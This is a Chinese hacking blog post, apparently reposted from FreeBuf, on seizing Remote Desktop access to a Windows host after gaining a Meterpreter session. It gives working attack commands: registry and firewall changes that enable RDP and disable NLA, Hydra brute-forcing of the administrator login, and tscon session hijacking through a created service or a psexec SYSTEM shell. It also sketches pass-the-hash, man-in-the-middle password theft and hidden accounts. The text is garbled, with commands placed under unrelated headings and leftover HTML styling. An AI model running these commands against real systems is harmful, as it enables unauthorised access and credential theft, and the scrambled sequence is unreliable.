作者：WHOAMI 其博客：https://whoamianony.top/转自原文地址：https://www.freebuf.com/articles/network/276242.html

于黑客领域，每项渗透如同紧张刺激的游戏。如今，我们将探讨自获Meterpreter连接目标主机起，逐步掌控远程桌面（RDP）的方法。此乃既是一项技术展示，亦是充满挑战的冒险之旅。

XML:lang="cmd" style="margin: 15px auto;padding: 10px;outline: none;max-width: 690px;letter-spacing: 0.544px;border-width: 0px;border-style: initial;border-color: initial;font-variant-numeric: inherit;font-variant-east-asian: inherit;font-stretch: inherit;font-size: 15px;line-height: 26px;vertical-align: baseline;font-family: 微软雅黑, "Microsoft YaHei", "WenQuanYi Micro Hei", PingFangSC;max-height: 600px;overflow: auto;background: rgb(248, 248, 248);color: rgb(89, 89, 89);word-break: break-word;text-wrap: wrap;text-align: start;">REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections    # 查看RDP服务是否开启: 1关闭, 0开启 

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ WinStations\RDP-Tcp" /v PortNumber    # 查看 RDP 服务的端口

tasklist /svc | find "TermService"    # 找到对应服务进程的 PID 
netstat -ano | find "3389"    # 找到进程对应的端口号

1.Meterpreter：黑客的魔法棒

nmap -sV -sC -p 3389 192.168.93.30

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

当握紧Meterpreter，便如握得魔法权杖。随意驾驭目标机，然而精髓在于巧妙地切入远程桌面。借助post/windows/manage/enable_rdp模块，等同在权杖上施展开启远程桌面的秘法。轻轻一触，目标机的远程桌面服务便恭顺应命开启。

use post/windows/manage/enable_rdp
set session 1
exploit

2.登录口令：黑客的金钥匙

redesktop 192.168.93.30
# redesktop IP

获取目标主机管理员账号密码，犹如握得金钥匙。这钥匙不仅可开启远程桌面，更赋予在目标系统内自由访问的权限。设想您在电脑前敲入这串神秘的密码，即刻展现目标主机桌面，体验宛如踏入另一个维度的感觉。

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

3.多用户会话：黑客的舞台

Hydra -v -f -l whoamianony\administrator -P /root/wordlists.txt rdp://192.168.93.30

在启用远程桌面服务的Windows系统中，多用户登录将触发系统创建多个会话。这构成黑客的操控平台，每会话即一待扮演的角色。用户只需右键点击“连接”并输入密码，即可轻易切换至他用户桌面。此过程犹如舞台上的快速换装，角色间实现无障碍切换。

4.会话劫持：黑客的隐身术

执行tscon指令能无凭证切换至远程桌面，模拟黑客隐匿身份。此过程技术难度高，极具挑战性，每一步切换犹如心跳加速的探险。

5.限制管理员模式：网络黑客的隐秘工具

若捕获的Hash无法被破解，且目标主机运行"受限管理员模式"，则Hash可被用于直接RDP远程登录。此方法如同黑客的秘籍，关键时刻助力突破防线。通过调整注册表开启或关闭该模式，如同为这秘籍安装了激活按钮，随时待命应对。

query user

6.中间人攻击：黑客的狡猾策略

执行RDP会话的中间人攻击，攻击者可窃取登录用户的明文密码，便于后续横向渗透。此乃黑客的狡诈手段，巧妙获取关键数据，为后续攻击奠定基础。每一次成功的中间人攻击，宛如棋局中的一着妙棋，让对方防备不及。

tscon 2 /PASSWORD:Bunny2021

7.隐藏账户与端口更改：黑客的终极技巧

tscon ID

为保持对目标Windows系统的访问权限，构建隐蔽账户乃一高级策略。此手段仿佛黑客的不传之秘，允许远程桌面连接至目标系统，令你在系统中游刃有余。进一步，运用PowerShell指令调整RDP端口至3390，为操作增添匿名性，提升目标主机的隐蔽性。

在黑客远程桌面竞赛中，每一次操作均蕴藏着紧张与挑战。你是否已准备好投身这场紧张刺激的冒险之旅？

sc create rdp binpath= "cmd.exe /k tscon 2 /dest:console"
sc start rdp

你是否设想过，一旦你精通此类黑客手法，将作何使用？敬请于评论区表达高见，并支持该文，共同揭开黑客领域的神秘面纱！

psexec -s -i cmd    # 获得一个 SYSTEM 权限的 cmd

quser user    # 在新获得的 SYSTEM 权限的 cmd 中执行劫持命令
tscon 2 /dest:console